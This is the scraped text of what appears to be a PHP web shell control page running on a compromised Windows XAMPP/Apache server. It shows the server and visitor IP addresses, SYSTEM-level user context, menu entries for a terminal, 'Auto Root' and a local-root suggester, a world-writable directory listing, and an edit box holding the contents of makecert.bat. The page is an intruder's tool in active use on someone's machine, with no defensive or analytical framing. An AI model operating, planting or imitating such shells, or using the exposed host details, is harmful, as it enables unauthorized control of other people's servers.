Windows NT KAMIDAKI 10.0 build 19045 (Windows 10) AMD64
Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.3.9
Server IP : 192.168.3.16 & Your IP : 216.73.216.84
Domains :
Cant Read [ /etc/named.conf ]
User : SISTEMA
Terminal
Auto Root
Create File
Create Folder
Localroot Suggester
Backdoor Destroyer
Readme
C: /
xampp /
apache /
Delete
Unzip
Name
Size
Permission
Date
Action
bin
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
conf
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
error
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
icons
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
include
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
lib
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
logs
[ DIR ]
drwxrwxrwx
2025-07-09 08:22
manual
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
modules
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
scripts
[ DIR ]
drwxrwxrwx
2025-06-09 14:58
ABOUT_APACHE.txt
13.42
KB
-rw-rw-rw-
2020-02-21 02:33
CHANGES.txt
59
B
-rw-rw-rw-
2023-10-18 11:15
INSTALL.txt
310
B
-rw-rw-rw-
2023-10-18 11:05
LICENSE.txt
43.45
KB
-rw-rw-rw-
2023-10-18 11:05
NOTICE.txt
2.8
KB
-rw-rw-rw-
2023-10-18 11:05
README.txt
4.65
KB
-rw-rw-rw-
2023-02-16 21:25
apache_installservice.bat
305
B
-rwxrwxrwx
2013-03-30 13:29
apache_uninstallservice.bat
352
B
-rwxrwxrwx
2013-03-30 13:29
makecert.bat
543
B
-rwxrwxrwx
2023-11-19 11:40
Save
Rename
@echo off set OPENSSL_CONF=./conf/openssl.cnf if not exist .\conf\ssl.crt mkdir .\conf\ssl.crt if not exist .\conf\ssl.key mkdir .\conf\ssl.key bin\openssl req -new -out server.csr bin\openssl rsa -in privkey.pem -out server.key bin\openssl x509 -in server.csr -out server.crt -req -signkey server.key -days 365 set OPENSSL_CONF= del .rnd del privkey.pem del server.csr move /y server.crt .\conf\ssl.crt move /y server.key .\conf\ssl.key echo. echo ----- echo Das Zertifikat wurde erstellt. echo The certificate was provided. echo. pause